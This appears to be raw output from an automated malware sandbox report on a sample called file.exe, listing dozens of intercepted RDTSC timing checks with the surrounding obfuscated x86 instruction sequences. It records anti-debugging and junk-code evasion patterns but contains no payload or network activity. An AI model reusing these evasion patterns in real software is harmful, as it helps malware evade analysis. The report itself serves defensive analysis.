        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED3E0 second address: DED3F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED55F second address: DED57F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F590909A3F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED57F second address: DED5AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5908B64E91h 0x0000000c jmp 00007F5908B64E75h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jno 00007F5908B64E66h 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DED5AA second address: DED5AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE024 second address: DEE04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5908B64E66h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F5908B64E72h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF31A8 second address: DF31AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF31AC second address: DF31BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F5908B64E66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF85E6 second address: DF85F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F590909A3E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF85F4 second address: DF8620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5908B64E78h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F5908B64E6Bh 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8620 second address: DF8624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAF9D second address: DFAFA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06500 second address: E06508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06508 second address: E06525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5908B64E78h 0x00000009 popad 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06525 second address: E0652B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0652B second address: E0652F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E05FB7 second address: E05FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F590909A3F5h 0x00000009 pop edi 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09B7C second address: E09BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F5908B64E70h 0x00000013 jmp 00007F5908B64E6Fh 0x00000018 popad 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09BAA second address: E09BAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E11114 second address: E1113D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5908B64E66h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jc 00007F5908B64E78h 0x00000013 jmp 00007F5908B64E72h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AF3E second address: E1AF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F590909A3E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AF4B second address: E1AF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AF56 second address: E1AF6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jbe 00007F590909A3E6h 0x00000011 pop eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AF6C second address: E1AF71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AF71 second address: E1AF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jng 00007F590909A3E6h 0x0000000c jmp 00007F590909A3EBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1ADED second address: E1AE00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AE00 second address: E1AE14 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F590909A3E6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AE14 second address: E1AE19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E20B11 second address: E20B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F590909A3E6h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E20E22 second address: E20E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5908B64E6Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21102 second address: E21109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21E7E second address: E21E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21E86 second address: E21EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F590909A3E6h 0x0000000a jmp 00007F590909A3F4h 0x0000000f jmp 00007F590909A3ECh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21EB5 second address: E21EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30E61 second address: E30E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30E67 second address: E30E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30E75 second address: E30E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F590909A3F5h 0x0000000e jbe 00007F590909A3E6h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E376EF second address: E37708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5908B64E73h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37708 second address: E3771B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jns 00007F590909A3E6h 0x0000000b jne 00007F590909A3E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37558 second address: E37564 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37564 second address: E3756A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3756A second address: E3756E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E350E1 second address: E350FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44FF1 second address: E44FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44FF5 second address: E45015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F590909A3F5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E45015 second address: E4501B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4501B second address: E45056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F590909A3EFh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F590909A3F2h 0x00000013 jbe 00007F590909A3E6h 0x00000019 pop edi 0x0000001a jbe 00007F590909A3EAh 0x00000020 push edi 0x00000021 pop edi 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44D45 second address: E44D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jg 00007F5908B64E66h 0x00000010 jbe 00007F5908B64E66h 0x00000016 jns 00007F5908B64E66h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44D66 second address: E44D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5A970 second address: E5A976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5A976 second address: E5A984 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5A984 second address: E5A995 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5908B64E66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push esi 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5A995 second address: E5A9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5A9A2 second address: E5A9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5AF2C second address: E5AF37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F590909A3E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5AF37 second address: E5AF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F5908B64E6Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B094 second address: E5B098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B098 second address: E5B09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B09C second address: E5B0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F590909A3E6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B0B6 second address: E5B0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B0BC second address: E5B0C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F7E7 second address: E5F7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5908B64E66h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F5908B64E6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F7FE second address: E5F802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F802 second address: E5F808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F808 second address: E5F80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5F8D5 second address: E5F8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FC64 second address: E5FC6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6106C second address: E6107E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5908B64E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F5908B64E66h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F20E second address: D7F214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F214 second address: D7F22B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5908B64E68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F5908B64E68h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F3EF second address: D7F40E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F590909A3E6h 0x00000009 jp 00007F590909A3E6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jp 00007F590909A3E6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F61C second address: D7F620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00285 second address: 4A0028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0028B second address: 4A002A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5908B64E79h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002A8 second address: 4A002AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002AC second address: 4A002F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F5908B64E6Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F5908B64E6Eh 0x00000018 add eax, 0281F4F8h 0x0000001e jmp 00007F5908B64E6Bh 0x00000023 popfd 0x00000024 mov esi, 62619A2Fh 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ax, di 0x00000032 movsx edi, ax 0x00000035 popad 0x00000036 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00360 second address: 4A00365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20639 second address: 4A2066D instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushfd 0x00000009 jmp 00007F5908B64E6Ah 0x0000000e adc ax, 10A8h 0x00000013 jmp 00007F5908B64E6Bh 0x00000018 popfd 0x00000019 pop ecx 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5908B64E6Bh 0x00000023 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2066D second address: 4A20672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20672 second address: 4A206BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d push esi 0x0000000e pushfd 0x0000000f jmp 00007F5908B64E79h 0x00000014 sub cx, 7E26h 0x00000019 jmp 00007F5908B64E71h 0x0000001e popfd 0x0000001f pop esi 0x00000020 popad 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ebx, 4B2419DCh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A206BE second address: 4A206C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A206C3 second address: 4A2079C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F5908B64E70h 0x00000011 lea eax, dword ptr [ebp-04h] 0x00000014 jmp 00007F5908B64E70h 0x00000019 nop 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F5908B64E6Eh 0x00000021 jmp 00007F5908B64E75h 0x00000026 popfd 0x00000027 call 00007F5908B64E70h 0x0000002c pushfd 0x0000002d jmp 00007F5908B64E72h 0x00000032 add al, 00000018h 0x00000035 jmp 00007F5908B64E6Bh 0x0000003a popfd 0x0000003b pop esi 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F5908B64E76h 0x00000043 nop 0x00000044 pushad 0x00000045 call 00007F5908B64E6Ah 0x0000004a call 00007F5908B64E72h 0x0000004f pop eax 0x00000050 pop edx 0x00000051 popad 0x00000052 push dword ptr [ebp+08h] 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 movsx ebx, si 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2081E second address: 4A20857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F590909A3EEh 0x00000010 je 00007F590909A425h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F590909A3EAh 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20857 second address: 4A2085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2085B second address: 4A20861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208A3 second address: 4A208BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5908B64E74h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208BB second address: 4A208D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F590909A3EAh 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208D0 second address: 4A208D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208D6 second address: 4A208DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208DA second address: 4A208E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208E8 second address: 4A208EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208EF second address: 4A208F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208F5 second address: 4A208F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
